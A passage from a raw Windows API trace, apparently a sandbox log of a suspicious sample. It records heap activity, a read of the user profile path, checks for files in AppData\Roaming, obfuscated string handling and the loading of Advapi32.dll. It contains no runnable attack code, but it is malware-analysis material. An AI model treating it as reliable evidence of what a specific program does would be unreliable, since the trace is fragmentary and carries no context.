(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0190.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0190.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0190.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0190.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0190.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0190.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0190.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0190.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0190.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0190.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0190.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0190.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0190.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0190.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0190.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0190.794] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/7sqV8uLS.bmp", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7sqV8uLS.bmp", lpFilePart=0x8bf658*="7sqV8uLS.bmp") returned 0x3a [0190.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0190.794] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7sqV8uLS.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7sqv8uls.bmp")) returned 0xffffffff [0190.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0190.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0190.795] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0190.795] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.795] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0190.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0190.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0190.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0190.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0190.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0190.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0190.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0190.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0190.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0190.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0190.796] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Adobe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0190.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0190.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0190.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0190.796] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0190.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0190.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0190.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0190.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0190.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0190.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0190.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0190.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0190.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0190.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0190.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0190.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0190.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0190.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0190.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0190.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0190.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0190.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0190.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0190.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0190.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0190.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0190.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0190.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0190.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0190.798] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0190.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0190.798] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0190.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0190.798] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0190.798] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0190.799] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa218 [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0190.799] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0190.799] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0190.800] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0190.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0190.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0190.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0190.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0190.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0190.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0190.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.800] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0190.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0190.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0190.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0190.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0190.800] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0190.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0190.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0190.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0190.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0190.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0190.801] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0190.801] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.801] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0190.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0190.801] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0190.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0190.801] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0190.801] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0190.801] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Adobe", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9da0038, dwReserved1=0x10fd4, cFileName="Adobe", cAlternateFileName="")) returned 0xaa58e0 [0190.802] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0190.802] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0190.802] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0190.802] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.802] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0190.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0190.802] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.803] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.803] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0190.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0190.803] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.803] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0190.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0190.803] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.803] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.803] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0190.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0190.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0190.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0190.803] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0190.804] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0190.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0190.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.804] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.804] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0190.804] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.804] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0190.805] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0190.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0190.805] 